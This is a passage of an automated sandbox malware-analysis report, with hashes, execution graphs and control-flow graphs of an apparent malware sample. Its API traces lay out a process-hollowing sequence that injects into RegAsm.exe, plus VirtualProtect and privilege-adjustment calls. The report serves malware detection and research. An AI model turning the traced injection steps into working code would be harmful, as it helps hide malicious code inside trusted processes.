                                                                                                                                                                                                                                          • Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4c359eaa5bd585196b9844ef3d0ba4c9150220677b31ea2db8c563af6f14485d
                                                                                                                                                                                                                                          • Instruction ID: 0ee8cfe33cbb69cbdeda4c3ceed8e2f0523afdfa8cdfa01394698949c8e9c64e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c359eaa5bd585196b9844ef3d0ba4c9150220677b31ea2db8c563af6f14485d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1D06CB89042298FCB20CF21C948A98B7B4AB49200F1041E6E50AB6265E6301E81CF14
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: bebb20a3ba956093c34a68811e0ab1826a87d059bcc21781d970ce7dbd1c7fde
                                                                                                                                                                                                                                          • Instruction ID: 3fa6ff88ee8852a21952a4437566ee327cb8b49051213fd0ccbbdea6533f125c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bebb20a3ba956093c34a68811e0ab1826a87d059bcc21781d970ce7dbd1c7fde
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0EC08CB0A09084C7DB03CB86D9409AE7AB2E701B21F081822C045635E0E776D8808B25

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:30.1%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                          Signature Coverage:21.4%
                                                                                                                                                                                                                                          Total number of Nodes:28
                                                                                                                                                                                                                                          Total number of Limit Nodes:1
                                                                                                                                                                                                                                          execution_graph 474 2d421a5 475 2d421dd CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 474->475 477 2d423ba WriteProcessMemory 475->477 478 2d423ff 477->478 479 2d42404 WriteProcessMemory 478->479 480 2d42441 WriteProcessMemory Wow64SetThreadContext ResumeThread 478->480 479->478 498 1000b57 499 1000b86 498->499 501 1000bd0 VirtualProtect 499->501 500 1000ba3 501->500 481 1000b78 482 1000b86 481->482 485 1000bd0 482->485 483 1000ba3 489 1000c14 485->489 486 1000f3c 486->483 487 1000fab VirtualProtect 488 1000fe8 487->488 488->483 489->486 489->487 490 1000988 491 100099d 490->491 493 1000a73 491->493 494 1000500 491->494 495 1000f60 VirtualProtect 494->495 497 1000fe8 495->497 497->493 502 1000979 503 100099d 502->503 504 1000500 VirtualProtect 503->504 505 1000a73 503->505 504->505

                                                                                                                                                                                                                                          Callgraph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                                                                                                          • Disassembly available
                                                                                                                                                                                                                                          callgraph 0 Function_01000300 1 Function_01000100 2 Function_01000500 3 Function_01000208 4 Function_0100030C 5 Function_0100010C 6 Function_0100050C 7 Function_01001010 8 Function_01000014 9 Function_01000214 10 Function_01000318 11 Function_01000519 12 Function_00FAD0E0 13 Function_00FAD0E1 14 Function_0100011C 15 Function_02D425C8 16 Function_0100051D 17 Function_01000521 18 Function_01000224 19 Function_01000324 20 Function_01000525 21 Function_02D425FD 22 Function_0100012C 23 Function_01000330 24 Function_01000434 25 Function_01000234 26 Function_02D425E0 27 Function_02D426E1 28 Function_0100033C 29 Function_0100013C 30 Function_01000B40 31 Function_01000540 32 Function_01000444 33 Function_01000244 34 Function_01000348 35 Function_01000848 36 Function_01000148 37 Function_01000450 38 Function_01000354 39 Function_01000254 40 Function_01000054 41 Function_01000154 42 Function_01000B57 96 Function_01000BD0 42->96 43 Function_0100045C 44 Function_02D42588 45 Function_01000060 46 Function_01000260 47 Function_01000360 48 Function_01000165 49 Function_01000565 50 Function_01000468 51 Function_0100026C 52 Function_0100036C 53 Function_02D425B8 54 Function_01000070 55 Function_02D421A5 56 Function_01000475 57 Function_00FAD18C 58 Function_01000378 59 Function_01000278 60 Function_01000178 61 Function_01000B78 61->96 62 Function_01000479 63 Function_01000979 63->2 63->6 110 Function_010004F4 63->110 64 Function_00FAD187 65 Function_0100047D 66 Function_01000080 67 Function_01000481 68 Function_01000284 69 Function_01000384 70 Function_01000485 71 Function_01000988 71->2 71->6 71->110 72 Function_01000188 73 Function_01000489 74 Function_0100048D 75 Function_01000090 76 Function_01000390 77 Function_01000491 78 Function_01000495 79 Function_01000198 80 Function_00FAD163 81 Function_01000499 82 Function_0100039C 83 Function_0100049D 84 Function_0100029D 85 Function_010000A0 86 Function_00FAD059 87 Function_010001A8 88 Function_010000B0 89 Function_010002B4 90 Function_010001B4 91 Function_010004B8 92 Function_010000BC 93 Function_010001C0 94 Function_010002C4 95 Function_010000C8 97 Function_010002D0 98 Function_010000D4 99 Function_010001D5 100 Function_010008D8 101 Function_010002DC 102 Function_02D42809 103 Function_02D4260B 104 Function_010000E4 105 Function_02D42530 106 Function_02D42630 107 Function_010008E8 108 Function_010002E8 109 Function_010000F0 111 Function_010002F4 112 Function_010001F8 113 Function_00FAD005

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02D42117,02D42107), ref: 02D42314
                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02D42327
                                                                                                                                                                                                                                          • Wow64GetThreadContext.KERNEL32(000003A8,00000000), ref: 02D42345
                                                                                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(000003AC,?,02D4215B,00000004,00000000), ref: 02D42369
                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(000003AC,?,?,00003000,00000040), ref: 02D42394
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(000003AC,00000000,?,?,00000000,?), ref: 02D423EC
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(000003AC,00400000,?,?,00000000,?,00000028), ref: 02D42437
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(000003AC,?,?,00000004,00000000), ref: 02D42475
                                                                                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(000003A8,02C00000), ref: 02D424B1
                                                                                                                                                                                                                                          • ResumeThread.KERNELBASE(000003A8), ref: 02D424C0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1816821272.0000000002D42000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D42000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2d42000_JxvL46JFox50ORU3tEsaxZ2Y.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                          • API String ID: 2687962208-1257834847
                                                                                                                                                                                                                                          • Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                                                                                                                                                                                                          • Instruction ID: 4f61ee13be17144ec8132a991b07d2357b9defb91277d6619e219e4e376e97e2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FB1D67664028AAFDB60CF68CC80BDA77A5FF88714F158124EA0CAB341D774FA41CB94

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 23 1000bd0-1000c37 26 1000cd8-1000ce6 23->26 27 1000c3d-1000c40 23->27 28 1000da2-1000db8 26->28 29 1000cec-1000cf4 26->29 30 1000c48-1000c56 27->30 31 1000f3c-1000f43 28->31 32 1000dbe-1000ddc 28->32 33 1000f46-1000fe6 VirtualProtect 29->33 34 1000cfa-1000d0d 29->34 30->33 43 1000c5c-1000ca7 30->43 35 1000de5-1000df0 32->35 36 1000dde-1000de4 32->36 49 1000fe8 33->49 50 1000fed-1001001 33->50 34->33 37 1000d13-1000d1f 34->37 35->33 39 1000df6-1000e02 35->39 36->35 41 1000d21-1000d27 37->41 42 1000d28-1000d59 37->42 44 1000e04-1000e0a 39->44 45 1000e0b-1000e12 39->45 41->42 42->33 47 1000d5f-1000d69 42->47 43->33 48 1000cad-1000cbe 43->48 44->45 45->33 51 1000e18-1000e22 45->51 47->33 52 1000d6f-1000d79 47->52 48->33 53 1000cc4-1000cd2 48->53 49->50 51->33 54 1000e28-1000e32 51->54 52->33 55 1000d7f-1000d85 52->55 53->26 53->27 54->33 57 1000e38-1000e3e 54->57 55->33 56 1000d8b-1000d9c 55->56 56->28 56->29 57->33 58 1000e44-1000e50 57->58 58->33 59 1000e56-1000e67 58->59 60 1000e70-1000eef 59->60 61 1000e69-1000e6f 59->61 69 1000ef1-1000efa 60->69 70 1000f05-1000f1c 60->70 61->60 69->70 71 1000efc-1000f03 69->71 73 1000f27-1000f36 70->73 71->73 73->31 73->32
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(03D43590,?,00000001,0000012C,?,?,?,00000000,00000000,?,01000A73,00000001,00000040), ref: 01000FD9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1749527096.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_1000000_JxvL46JFox50ORU3tEsaxZ2Y.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                          • String ID: &S!$<1i;
                                                                                                                                                                                                                                          • API String ID: 544645111-1770337207
                                                                                                                                                                                                                                          • Opcode ID: a502ff4844127aad62397f24c5c5966476eefb6a653ab25c1daf6539150e3f0c
                                                                                                                                                                                                                                          • Instruction ID: 10ce6abd714f0fd71461ea4209c89855fcc7ebd9d2627c504564f6b3c16dfac8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a502ff4844127aad62397f24c5c5966476eefb6a653ab25c1daf6539150e3f0c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5C18E70A042598FDB12CFA9C9807EDFBF1BF49310F648599E499AB246C7349D41CFA4

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 74 1000500-1000fe6 VirtualProtect 77 1000fe8 74->77 78 1000fed-1001001 74->78 77->78
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(03D43590,?,00000001,0000012C,?,?,?,00000000,00000000,?,01000A73,00000001,00000040), ref: 01000FD9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1749527096.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_1000000_JxvL46JFox50ORU3tEsaxZ2Y.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                          • Opcode ID: d689e76278027f09ca4baa36d9e68c63b5d75c55afc80b4c84edc4466778e854
                                                                                                                                                                                                                                          • Instruction ID: ee5868f694bf2ff4c88e81fd3430441f844052ed0736b413630e74565fda1f8c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d689e76278027f09ca4baa36d9e68c63b5d75c55afc80b4c84edc4466778e854
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A821F2B590025DEFDB00CF9AC884BDEFBB4FB08310F10812AE918A7640C3B5A954CFA5

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 110 fad005-fad079 116 fad07b-fad086 110->116 117 fad0c9-fad0d1 110->117 118 fad088-fad096 116->118 119 fad0be-fad0c5 116->119 117->116 122 fad09c 118->122 119->118 123 fad0c7 119->123 124 fad09f-fad0a7 122->124 123->124 125 fad0a9-fad0b1 124->125 126 fad0b7-fad0bc 124->126 125->126 126->125
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1727971767.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_fad000_JxvL46JFox50ORU3tEsaxZ2Y.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 95738f4a4b66ccba6996d2ab637918e6aef4fffbb661469372f1e4fb6e45b7a3
                                                                                                                                                                                                                                          • Instruction ID: bd09a27d90f4a83c96893dc2caeef2113f6875b4248e9fa4f9a5c3de8dc95c6d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95738f4a4b66ccba6996d2ab637918e6aef4fffbb661469372f1e4fb6e45b7a3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7631E26140E3D08FD7138B258CA4662BF789F53224B1E84DBD889CF5ABC16A8849D772

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 168 fad059-fad079 169 fad07b-fad086 168->169 170 fad0c9-fad0d1 168->170 171 fad088-fad096 169->171 172 fad0be-fad0c5 169->172 170->169 175 fad09c 171->175 172->171 176 fad0c7 172->176 177 fad09f-fad0a7 175->177 176->177 178 fad0a9-fad0b1 177->178 179 fad0b7-fad0bc 177->179 178->179 179->178
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1727971767.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_fad000_JxvL46JFox50ORU3tEsaxZ2Y.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 657dc2f6eb1d3cd61792a9802c578094de315817a8bf63ebb4fb34eab6569c08
                                                                                                                                                                                                                                          • Instruction ID: 98348148925323e6ccef92e77f038254893b60758cc4c7004b4f4394cbff1871
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 657dc2f6eb1d3cd61792a9802c578094de315817a8bf63ebb4fb34eab6569c08
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F01DBB15093449BE7204A65DD84767BBE8DF42334F18C41AED0A0F68AC3799845EA76

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:21.4%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:1.6%
                                                                                                                                                                                                                                          Total number of Nodes:1520
                                                                                                                                                                                                                                          Total number of Limit Nodes:22
                                                                                                                                                                                                                                          execution_graph 5448 407548 5449 407554 CloseHandle 5448->5449 5450 40755d 5448->5450 5449->5450 6685 402b48 RaiseException 5890 407749 5891 4076dc WriteFile 5890->5891 5896 407724 5890->5896 5892 4076e8 5891->5892 5893 4076ef 5891->5893 5894 40748c 35 API calls 5892->5894 5895 407700 5893->5895 5897 4073ec 34 API calls 5893->5897 5894->5893 5896->5890 5898 4077e0 5896->5898 5897->5895 5899 4078db InterlockedExchange 5898->5899 5901 407890 5898->5901 5900 4078e7 5899->5900 6686 40294a 6689 402952 6686->6689 6687 402967 6688 403554 4 API calls 6688->6689 6689->6687 6689->6688 6690 403f4a 6691 403f53 6690->6691 6692 403f5c 6690->6692 6694 403f07 6691->6694 6697 403f09 6694->6697 6696 403f3c 6696->6692 6698 403154 4 API calls 6697->6698 6700 403e9c 6697->6700 6703 403f3d 6697->6703 6717 403e9c 6697->6717 6698->6697 6699 403ef2 6702 402674 4 API calls 6699->6702 6700->6696 6700->6699 6706 403ea9 6700->6706 6708 403e8e 6700->6708 6705 403ecf 6702->6705 6703->6692 6705->6692 6706->6705 6707 402674 4 API calls 6706->6707 6707->6705 6710 403e4c 6708->6710 6709 403e67 6715 403e78 6709->6715 6716 402674 4 API calls 6709->6716 6710->6709 6711 403e62 6710->6711 6712 403e7b 6710->6712 6714 403cc8 4 API calls 6711->6714 6713 402674 4 API calls 6712->6713 6713->6715 6714->6709 6715->6699 6715->6706 6716->6715 6718 403ed7 6717->6718 6724 403ea9 6717->6724 6719 403ef2 6718->6719 6721 403e8e 4 API calls 6718->6721 6722 402674 4 API calls 6719->6722 6720 403ecf 6720->6697 6723 403ee6 6721->6723 6722->6720 6723->6719 6723->6724 6724->6720 6725 402674 4 API calls 6724->6725 6725->6720 6244 40ac4f 6245 40abc1 6244->6245 6246 4094d8 9 API calls 6245->6246 6248 40abed 6245->6248 6246->6248 6247 40ac06 6249 40ac1a 6247->6249 6250 40ac0f DestroyWindow 6247->6250 6248->6247 6251 40ac00 RemoveDirectoryA 6248->6251 6252 40ac42 6249->6252 6253 40357c 4 API calls 6249->6253 6250->6249 6251->6247 6254 40ac38 6253->6254 6255 4025ac 4 API calls 6254->6255 6255->6252 6256 403a52 6257 403a74 6256->6257 6258 403a5a WriteFile 6256->6258 6258->6257 6259 403a78 GetLastError 6258->6259 6259->6257 6260 402654 6261 403154 4 API calls 6260->6261 6262 402614 6261->6262 6263 403154 4 API calls 6262->6263 6264 402632 6262->6264 6263->6264 6265 40ac56 6266 40ac5d 6265->6266 6268 40ac88 6265->6268 6275 409448 6266->6275 6270 403198 4 API calls 6268->6270 6269 40ac62 6269->6268 6272 40ac80 MessageBoxA 6269->6272 6271 40acc0 6270->6271 6273 403198 4 API calls 6271->6273 6272->6268 6274 40acc8 6273->6274 6276 409454 GetCurrentProcess OpenProcessToken 6275->6276 6277 4094af ExitWindowsEx 6275->6277 6278 409466 6276->6278 6279 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6276->6279 6277->6278 6278->6269 6279->6277 6279->6278 6734 40995e 6735 409960 6734->6735 6736 409982 6735->6736 6737 40999e CallWindowProcA 6735->6737 6737->6736 6738 409960 6739 409982 6738->6739 6741 40996f 6738->6741 6740 40999e CallWindowProcA 6740->6739 6741->6739 6741->6740 6742 405160 6743 405173 6742->6743 6744 404e58 33 API calls 6743->6744 6745 405187 6744->6745 6280 402e64 6281 402e69 6280->6281 6282 402e7a RtlUnwind 6281->6282 6283 402e5e 6281->6283 6284 402e9d 6282->6284 5902 40766c SetFilePointer 5903 4076a3 5902->5903 5904 407693 GetLastError 5902->5904 5904->5903 5905 40769c 5904->5905 5906 40748c 35 API calls 5905->5906 5906->5903 6297 40667c IsDBCSLeadByte 6298 406694 6297->6298 6758 403f7d 6759 403fa2 6758->6759 6761 403f84 6758->6761 6759->6761 6762 403e8e 4 API calls 6759->6762 6760 403f8c 6761->6760 6763 402674 4 API calls 6761->6763 6762->6761 6764 403fca 6763->6764 6765 403d02 6767 403d12 6765->6767 6766 403ddf ExitProcess 6767->6766 6768 403db8 6767->6768 6770 403dea 6767->6770 6775 403da4 6767->6775 6776 403d8f MessageBoxA 6767->6776 6769 403cc8 4 API calls 6768->6769 6771 403dc2 6769->6771 6772 403cc8 4 API calls 6771->6772 6773 403dcc 6772->6773 6785 4019dc 6773->6785 6781 403fe4 6775->6781 6776->6768 6777 403dd1 6777->6766 6777->6770 6782 403fe8 6781->6782 6783 403f07 4 API calls 6782->6783 6784 404006 6783->6784 6786 401abb 6785->6786 6787 4019ed 6785->6787 6786->6777 6788 401a04 RtlEnterCriticalSection 6787->6788 6789 401a0e LocalFree 6787->6789 6788->6789 6790 401a41 6789->6790 6791 401a2f VirtualFree 6790->6791 6792 401a49 6790->6792 6791->6790 6793 401a70 LocalFree 6792->6793 6794 401a87 6792->6794 6793->6793 6793->6794 6795 401aa9 RtlDeleteCriticalSection 6794->6795 6796 401a9f RtlLeaveCriticalSection 6794->6796 6795->6777 6796->6795 6303 404206 6304 4041cc 6303->6304 6307 40420a 6303->6307 6305 404282 6306 403154 4 API calls 6308 404323 6306->6308 6307->6305 6307->6306 6309 402c08 6310 402c82 6309->6310 6313 402c19 6309->6313 6311 402c56 RtlUnwind 6312 403154 4 API calls 6311->6312 6312->6310 6313->6310 6313->6311 6316 402b28 6313->6316 6317 402b31 RaiseException 6316->6317 6318 402b47 6316->6318 6317->6318 6318->6311 6319 408c10 6320 408c17 6319->6320 6321 403198 4 API calls 6320->6321 6329 408cb1 6321->6329 6322 408cdc 6323 4031b8 4 API calls 6322->6323 6324 408d69 6323->6324 6325 408cc8 6327 4032fc 18 API calls 6325->6327 6326 403278 18 API calls 6326->6329 6327->6322 6328 4032fc 18 API calls 6328->6329 6329->6322 6329->6325 6329->6326 6329->6328 6334 40a814 6335 40a839 6334->6335 6336 40993c 29 API calls 6335->6336 6339 40a83e 6336->6339 6337 40a891 6368 4026c4 GetSystemTime 6337->6368 6339->6337 6342 408dd8 18 API calls 6339->6342 6340 40a896 6341 409330 46 API calls 6340->6341 6343 40a89e 6341->6343 6344 40a86d 6342->6344 6345 4031e8 18 API calls 6343->6345 6348 40a875 MessageBoxA 6344->6348 6346 40a8ab 6345->6346 6347 406928 19 API calls 6346->6347 6349 40a8b8 6347->6349 6348->6337 6350 40a882 6348->6350 6351 4066c0 19 API calls 6349->6351 6352 405864 19 API calls 6350->6352 6353 40a8c8 6351->6353 6352->6337 6354 406638 19 API calls 6353->6354 6355 40a8d9 6354->6355 6356 403340 18 API calls 6355->6356 6357 40a8e7 6356->6357 6358 4031e8 18 API calls 6357->6358 6359 40a8f7 6358->6359 6360 4074e0 37 API calls 6359->6360 6361 40a936 6360->6361 6362 402594 18 API calls 6361->6362 6363 40a956 6362->6363 6364 407a28 19 API calls 6363->6364 6365 40a998 6364->6365 6366 407cb8 35 API calls 6365->6366 6367 40a9bf 6366->6367 6368->6340 5446 407017 5447 407008 SetErrorMode 5446->5447 6369 403018 6370 403070 6369->6370 6371 403025 6369->6371 6372 40302a RtlUnwind 6371->6372 6373 40304e 6372->6373 6375 402f78 6373->6375 6376 402be8 6373->6376 6377 402bf1 RaiseException 6376->6377 6378 402c04 6376->6378 6377->6378 6378->6370 6383 40901e 6384 409010 6383->6384 6385 408fac Wow64RevertWow64FsRedirection 6384->6385 6386 409018 6385->6386 6387 409020 SetLastError 6388 409029 6387->6388 6403 403a28 ReadFile 6404 403a46 6403->6404 6405 403a49 GetLastError 6403->6405 5907 40762c ReadFile 5908 407663 5907->5908 5909 40764c 5907->5909 5910 407652 GetLastError 5909->5910 5911 40765c 5909->5911 5910->5908 5910->5911 5912 40748c 35 API calls 5911->5912 5912->5908 6807 40712e 6808 407118 6807->6808 6809 403198 4 API calls 6808->6809 6810 407120 6809->6810 6811 403198 4 API calls 6810->6811 6812 407128 6811->6812 5927 40a82f 5928 409ae8 18 API calls 5927->5928 5929 40a834 5928->5929 5930 40a839 5929->5930 5931 402f24 5 API calls 5929->5931 5964 40993c 5930->5964 5931->5930 5933 40a891 5969 4026c4 GetSystemTime 5933->5969 5935 40a83e 5935->5933 6030 408dd8 5935->6030 5936 40a896 5970 409330 5936->5970 5940 40a86d 5944 40a875 MessageBoxA 5940->5944 5941 4031e8 18 API calls 5942 40a8ab 5941->5942 5988 406928 5942->5988 5944->5933 5946 40a882 5944->5946 6033 405864 5946->6033 5951 40a8d9 6015 403340 5951->6015 5953 40a8e7 5954 4031e8 18 API calls 5953->5954 5955 40a8f7 5954->5955 5956 4074e0 37 API calls 5955->5956 5957 40a936 5956->5957 5958 402594 18 API calls 5957->5958 5959 40a956 5958->5959 5960 407a28 19 API calls 5959->5960 5961 40a998 5960->5961 5962 407cb8 35 API calls 5961->5962 5963 40a9bf 5962->5963 6037 40953c 5964->6037 5967 4098cc 19 API calls 5968 40995c 5967->5968 5968->5935 5969->5936 5977 409350 5970->5977 5973 409375 CreateDirectoryA 5974 4093ed 5973->5974 5975 40937f GetLastError 5973->5975 5976 40322c 4 API calls 5974->5976 5975->5977 5978 4093f7 5976->5978 5977->5973 5979 408dd8 18 API calls 5977->5979 5980 404c94 33 API calls 5977->5980 5983 407284 19 API calls 5977->5983 5986 408da8 18 API calls 5977->5986 5987 405890 18 API calls 5977->5987 6093 406cf4 5977->6093 6116 409224 5977->6116 5981 4031b8 4 API calls 5978->5981 5979->5977 5980->5977 5982 409411 5981->5982 5984 4031b8 4 API calls 5982->5984 5983->5977 5985 40941e 5984->5985 5985->5941 5986->5977 5987->5977 6222 406820 5988->6222 5991 403454 18 API calls 5992 40694a 5991->5992 5993 4066c0 5992->5993 6227 4068e4 5993->6227 5996 4066f0 5998 403340 18 API calls 5996->5998 5997 4066fe 5999 403454 18 API calls 5997->5999 6000 4066fc 5998->6000 6001 406711 5999->6001 6003 403198 4 API calls 6000->6003 6002 403340 18 API calls 6001->6002 6002->6000 6004 406733 6003->6004 6005 406638 6004->6005 6006 406642 6005->6006 6007 406665 6005->6007 6233 406950 6006->6233 6009 40322c 4 API calls 6007->6009 6011 40666e 6009->6011 6010 406649 6010->6007 6012 406654 6010->6012 6011->5951 6013 403340 18 API calls 6012->6013 6014 406662 6013->6014 6014->5951 6016 403344 6015->6016 6017 4033a5 6015->6017 6018 4031e8 6016->6018 6019 40334c 6016->6019 6023 403254 18 API calls 6018->6023 6025 4031fc 6018->6025 6019->6017 6021 40335b 6019->6021 6024 4031e8 18 API calls 6019->6024 6020 403228 6020->5953 6022 403254 18 API calls 6021->6022 6027 403375 6022->6027 6023->6025 6024->6021 6025->6020 6026 4025ac 4 API calls 6025->6026 6026->6020 6028 4031e8 18 API calls 6027->6028 6029 4033a1 6028->6029 6029->5953 6031 408da8 18 API calls 6030->6031 6032 408df4 6031->6032 6032->5940 6034 405869 6033->6034 6035 405940 19 API calls 6034->6035 6036 40587b 6035->6036 6036->6036 6044 40955b 6037->6044 6038 409590 6041 40959d GetUserDefaultLangID 6038->6041 6045 409592 6038->6045 6039 409594 6049 407024 GetModuleHandleA GetProcAddress 6039->6049 6041->6045 6043 40956f 6043->5967 6044->6038 6044->6039 6044->6043 6045->6043 6046 4095cb GetACP 6045->6046 6047 4095ef 6045->6047 6046->6043 6046->6045 6047->6043 6048 409615 GetACP 6047->6048 6048->6043 6048->6047 6050 407067 6049->6050 6051 40705e 6049->6051 6052 407070 6050->6052 6053 4070a8 6050->6053 6060 403198 4 API calls 6051->6060 6070 406f68 6052->6070 6054 406f68 RegOpenKeyExA 6053->6054 6058 4070c1 6054->6058 6056 407089 6057 4070de 6056->6057 6073 406f5c 6056->6073 6062 40322c 4 API calls 6057->6062 6058->6057 6061 406f5c 20 API calls 6058->6061 6064 407120 6060->6064 6065 4070d5 RegCloseKey 6061->6065 6066 4070eb 6062->6066 6067 403198 4 API calls 6064->6067 6065->6057 6068 4032fc 18 API calls 6066->6068 6069 407128 6067->6069 6068->6051 6069->6045 6071 406f73 6070->6071 6072 406f79 RegOpenKeyExA 6070->6072 6071->6072 6072->6056 6076 406e10 6073->6076 6077 406e36 RegQueryValueExA 6076->6077 6078 406e59 6077->6078 6083 406e7b 6077->6083 6079 406e73 6078->6079 6078->6083 6084 403278 18 API calls 6078->6084 6085 403420 18 API calls 6078->6085 6081 403198 4 API calls 6079->6081 6080 403198 4 API calls 6082 406f47 RegCloseKey 6080->6082 6081->6083 6082->6057 6083->6080 6084->6078 6086 406eb0 RegQueryValueExA 6085->6086 6086->6077 6087 406ecc 6086->6087 6087->6083 6088 4034f0 18 API calls 6087->6088 6089 406f0e 